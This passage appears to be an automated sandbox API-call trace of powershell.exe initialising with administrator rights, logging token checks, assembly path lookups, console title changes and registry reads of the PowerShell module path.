ReturnLength=0x12d8b8 | out: TokenInformation=0x0, ReturnLength=0x12d8b8) returned 0 [0067.045] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x23a7e0 [0067.045] GetTokenInformation (in: TokenHandle=0x330, TokenInformationClass=0x8, TokenInformation=0x23a7e0, TokenInformationLength=0x4, ReturnLength=0x12d8b8 | out: TokenInformation=0x23a7e0, ReturnLength=0x12d8b8) returned 1 [0067.047] DuplicateTokenEx (in: hExistingToken=0x330, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12da18 | out: phNewToken=0x12da18*=0x32c) returned 1 [0067.047] GetTokenInformation (in: TokenHandle=0x330, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d8b8 | out: TokenInformation=0x0, ReturnLength=0x12d8b8) returned 0 [0067.048] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x23a810 [0067.048] GetTokenInformation (in: TokenHandle=0x330, TokenInformationClass=0x8, TokenInformation=0x23a810, TokenInformationLength=0x4, ReturnLength=0x12d8b8 | out: TokenInformation=0x23a810, ReturnLength=0x12d8b8) returned 1 [0067.049] CheckTokenMembership (in: TokenHandle=0x32c, SidToCheck=0x2de00d0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12da28 | out: IsMember=0x12da28) returned 1 [0067.049] CloseHandle (hObject=0x32c) returned 1 [0067.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.094] CoTaskMemAlloc (cb=0x804) returned 0x2eda70 [0067.094] GetConsoleTitleW (in: lpConsoleTitle=0x2eda70, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0067.095] CoTaskMemFree (pv=0x2eda70) [0067.173] CoTaskMemAlloc (cb=0x804) returned 0x2ee4b0 [0067.173] GetConsoleTitleW (in: lpConsoleTitle=0x2ee4b0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0067.174] CoTaskMemFree (pv=0x2ee4b0) [0067.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.176] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0067.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.264] SetConsoleCtrlHandler (HandlerRoutine=0x29568dc, Add=1) returned 1 [0067.277] GetStdHandle (nStdHandle=0xfffffff6) returned 0xe4 [0067.279] GetConsoleMode (in: hConsoleHandle=0xe4, lpMode=0x12da80 | out: lpMode=0x12da80) returned 0 [0067.280] GetConsoleCP () returned 0x1b5 [0067.297] GetFileType (hFile=0xe4) returned 0x3 [0067.331] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338 [0067.332] CoCreateGuid (in: pguid=0x12db10 | out: pguid=0x12db10*(Data1=0x71769bfb, Data2=0x5da, Data3=0x4b74, Data4=([0]=0x97, [1]=0x6d, [2]=0x9f, [3]=0xc, [4]=0xb9, [5]=0xdb, [6]=0x4b, [7]=0x12))) returned 0x0 [0067.333] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.333] CoTaskMemFree (pv=0x230110) [0067.341] WinSqmIsOptedIn () returned 0x0 [0067.342] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.342] CoTaskMemFree (pv=0x230110) [0067.343] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.344] CoTaskMemFree (pv=0x230110) [0067.344] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.344] CoTaskMemFree (pv=0x230110) [0067.345] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.345] CoTaskMemFree (pv=0x230110) [0067.346] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.346] CoTaskMemFree (pv=0x230110) [0067.350] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.350] CoTaskMemFree (pv=0x230110) [0067.350] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.350] CoTaskMemFree (pv=0x230110) [0067.351] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.351] CoTaskMemFree (pv=0x230110) [0067.353] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.353] CoTaskMemFree (pv=0x230110) [0067.365] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.365] CoTaskMemFree (pv=0x230110) [0067.369] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.369] CoTaskMemFree (pv=0x230110) [0067.370] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.370] CoTaskMemFree (pv=0x230110) [0067.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0067.649] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.649] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0067.649] CoTaskMemFree (pv=0x230110) [0067.651] CoTaskMemAlloc (cb=0xcc) returned 0x2eb2e0 [0067.651] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2eb2e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0067.651] CoTaskMemFree (pv=0x2eb2e0) [0067.651] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x33c) returned 0x0 [0067.651] RegQueryValueExW (in: hKey=0x33c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d60c, lpData=0x0, lpcbData=0x12d608*=0x0 | out: lpType=0x12d60c*=0x2, lpData=0x0, lpcbData=0x12d608*=0x6c) returned 0x0 [0067.651] CoTaskMemAlloc (cb=0x70) returned 0x26a760 [0067.651] RegQueryValueExW (in: hKey=0x33c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d5dc, lpData=0x26a760, lpcbData=0x12d5d8*=0x6c | out: lpType=0x12d5dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12d5d8*=0x6c) returned 0x0 [0067.651] CoTaskMemFree (pv=0x26a760) [0067.652] CoTaskMemAlloc (cb=0xcc) returned 0x2eb2e0 [0067.652] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2eb2e0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0067.652] CoTaskMemFree (pv=0x2eb2e0) [0067.652] CoTaskMemAlloc (cb=0xcc) returned 0x2eb2e0 [0067.652] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2eb2e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0067.652] CoTaskMemFree (pv=0x2eb2e0) [0067.655] RegCloseKey (hKey=0x33c) returned 0x0 [0067.655] CoTaskMemAlloc (cb=0xcc) returned 0x2eb2e0 [0067.655] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2eb2e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0067.655] CoTaskMemFree (pv=0x2eb2e0) [0067.655] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x33c) returned 0x0 [0067.655] RegQueryValueExW (in: hKey=0x33c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d60c, lpData=0x0, lpcbData=0x12d608*=0x0 | out: lpType=0x12d60c*=0x0, lpData=0x0, lpcbData=0x12d608*=0x0) returned 0x2 [0067.656] RegCloseKey (hKey=0x33c) returned 0x0 [0067.703] CoTaskMemAlloc (cb=0x20c) returned 0x2bcc30 [0067.703] SHGetFolderPathW (in: hwnd=0x0, csidl=5, 